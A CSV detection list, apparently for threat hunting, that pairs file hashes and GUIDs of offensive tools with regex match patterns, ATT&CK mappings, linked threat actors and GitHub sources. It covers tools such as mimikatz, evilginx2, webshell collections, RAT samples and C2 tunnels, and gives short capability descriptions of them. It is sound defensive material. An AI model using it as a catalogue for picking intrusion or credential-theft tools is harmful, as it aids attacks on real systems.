"*E61C950E-A03D-40E2-AAD5-304C48570364*",".{0,1000}E61C950E\-A03D\-40E2\-AAD5\-304C48570364.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#GUIDproject","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","42153"
"*e62043f8389effbe26300cc7cd1d9af3b25d6efc1eb0d604d837f58a89e485ad*",".{0,1000}e62043f8389effbe26300cc7cd1d9af3b25d6efc1eb0d604d837f58a89e485ad.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42155"
"*e62b8454cfe35f36330c83adb4665982afe6a22d9edd47a923a7aecf135cd99b*",".{0,1000}e62b8454cfe35f36330c83adb4665982afe6a22d9edd47a923a7aecf135cd99b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42158"
"*e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3*",".{0,1000}e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42159"
"*e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d*",".{0,1000}e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42160"
"*e62fbd3fb597685aefc283c4a27753e5495fdc7a6e4acd349304d4ab242a32c6*",".{0,1000}e62fbd3fb597685aefc283c4a27753e5495fdc7a6e4acd349304d4ab242a32c6.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","42161"
"*e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8*",".{0,1000}e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42162"
"*e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd*",".{0,1000}e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42163"
"*e6359a7bfd1ac7ffb8432de776f66ad70e20ba588880e641613aabf29dffa0c3*",".{0,1000}e6359a7bfd1ac7ffb8432de776f66ad70e20ba588880e641613aabf29dffa0c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42164"
"*e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8*",".{0,1000}e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42168"
"*e6449478a32a49ac379f11e0f346267f44f590e777c32902e2bc06903118a69a*",".{0,1000}e6449478a32a49ac379f11e0f346267f44f590e777c32902e2bc06903118a69a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42170"
"*e64efe84d00a0c06cc9672f7d2c96e39c6ef7ef4b8ff1671f35e369a03431af9*",".{0,1000}e64efe84d00a0c06cc9672f7d2c96e39c6ef7ef4b8ff1671f35e369a03431af9.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","42172"
"*e6542f9cae2a9555feab0aef1287bc9a1ececc56f6e144a731546c68fe5843c5*",".{0,1000}e6542f9cae2a9555feab0aef1287bc9a1ececc56f6e144a731546c68fe5843c5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42173"
"*e65ca194ca5dd3606ca5c0b67b2cf3df4cc38283e4aa11933002b430fc5be17b*",".{0,1000}e65ca194ca5dd3606ca5c0b67b2cf3df4cc38283e4aa11933002b430fc5be17b.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","42175"
"*e65f36c9186c0a94d3cb013a1083ef0cef93b3cbc2d8af77dc0911bcced37c62*",".{0,1000}e65f36c9186c0a94d3cb013a1083ef0cef93b3cbc2d8af77dc0911bcced37c62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42176"
"*e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad*",".{0,1000}e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42177"
"*e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e*",".{0,1000}e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42179"
"*e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735*",".{0,1000}e685904d607a73c1916b6a7d9cc2eb42e4afd1cf2e77e728b7dbeb141eda2735.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","42185"
"*e68d7eeec87b2ff9e85cb89198c49f36cace41a13262e8a3c2ce3c4852e192c6*",".{0,1000}e68d7eeec87b2ff9e85cb89198c49f36cace41a13262e8a3c2ce3c4852e192c6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42186"
"*e6908a1213c11347794011b5d126561d39408d3e9e919f1a719135a6221813b9*",".{0,1000}e6908a1213c11347794011b5d126561d39408d3e9e919f1a719135a6221813b9.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","42187"
"*e693e05888147223f78c57a5d2a0bccc594af7e6f0d9c5d6bd8a0cb5d420a851*",".{0,1000}e693e05888147223f78c57a5d2a0bccc594af7e6f0d9c5d6bd8a0cb5d420a851.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42188"
"*e696484e41d70abaa95a09f2c77e5198a6556f5f5884f0d84bf21c5926c5afc7*",".{0,1000}e696484e41d70abaa95a09f2c77e5198a6556f5f5884f0d84bf21c5926c5afc7.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","42189"
"*e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7*","e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","42191"
"*e69d0aa27378192017324d6748de04c9024a2254b599e93c22815e145b28dbc2*",".{0,1000}e69d0aa27378192017324d6748de04c9024a2254b599e93c22815e145b28dbc2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42192"
"*e69f0324-3afb-485e-92c7-cb097ea47caf*",".{0,1000}e69f0324\-3afb\-485e\-92c7\-cb097ea47caf.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#GUIDproject","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","42193"
"*e6a224c7e04876dd864113178ed66d949cd74145bf813e440f9dc1d5ca7b595e*",".{0,1000}e6a224c7e04876dd864113178ed66d949cd74145bf813e440f9dc1d5ca7b595e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42194"
"*e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d*",".{0,1000}e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42197"
"*e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d*",".{0,1000}e6b9b81643f27334434561f226d95e6729518eb4eb016e5a54a809fab583ef4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42198"
"*e6be8653e8355627406150a70434675aaad1cab5dbe2116237df5bf2ff7f4b45*",".{0,1000}e6be8653e8355627406150a70434675aaad1cab5dbe2116237df5bf2ff7f4b45.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","42200"
"*e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62*",".{0,1000}e6c2db94a0b0f667ef69e2e28e507a5e7fa629636b93506c119ccac224d74e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42201"
"*e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2*",".{0,1000}e6cab14548d77b0f7829ceb222c1b634432afd423dcbf61e160634096b82bce2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42203"
"*e6d5759ff74805dfb7e2b133493111a1a265e06d4dfcee80302048b6a173334a*",".{0,1000}e6d5759ff74805dfb7e2b133493111a1a265e06d4dfcee80302048b6a173334a.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","42204"
"*e6d5c1e969b24be2c277ab70bb74169c45338967acb114a80bd2b78dfbdd2c31*",".{0,1000}e6d5c1e969b24be2c277ab70bb74169c45338967acb114a80bd2b78dfbdd2c31.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42205"
"*e6da23f77e5990f4692c09e10a16f594a6c51b817bf14f5a7a96d3f109df5a2a*",".{0,1000}e6da23f77e5990f4692c09e10a16f594a6c51b817bf14f5a7a96d3f109df5a2a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42208"
"*e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c*",".{0,1000}e6db508c611d834b9ad9f20bebef8507fec5f642a051ea1c6ae659b729db3c1c.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","42209"
"*e6dff41219521c5b2daf06379ac793df0a633b7271c8fd7c482c950eb655c182*",".{0,1000}e6dff41219521c5b2daf06379ac793df0a633b7271c8fd7c482c950eb655c182.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42210"
"*e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5*",".{0,1000}e6e05a88178633c271919ae5ea4c9633991774e2fd345ffe3052c209e2ef31d5.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#filehash","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","42211"
"*e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43*",".{0,1000}e6e37edd595cc04216682cda2af0ef0d0580fd3c8c808fb65df547c432ee9a43.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42212"
"*e6e64c0ea43db6a4e271642f3feeb0ad058c99947f14c4b05a556e4c703ac4c1*",".{0,1000}e6e64c0ea43db6a4e271642f3feeb0ad058c99947f14c4b05a556e4c703ac4c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42214"
"*e6e7406f1de4d3797e83f273c669296173e754769dae206c47eecd480d722f62*",".{0,1000}e6e7406f1de4d3797e83f273c669296173e754769dae206c47eecd480d722f62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42215"
"*e6e7a49af780e80542a3b0e80b9bd524bcb513fa200800f7571112be8f681abb*",".{0,1000}e6e7a49af780e80542a3b0e80b9bd524bcb513fa200800f7571112be8f681abb.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","42216"
"*e6e97a564798df361f372645253f7601dbfd3c762c4143326df41a574bc97d22*",".{0,1000}e6e97a564798df361f372645253f7601dbfd3c762c4143326df41a574bc97d22.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42217"
"*e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e*",".{0,1000}e6ea547331fd4daf15426484f27c256d680bca82d911c038ec1e1b97e1a2e14e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42218"
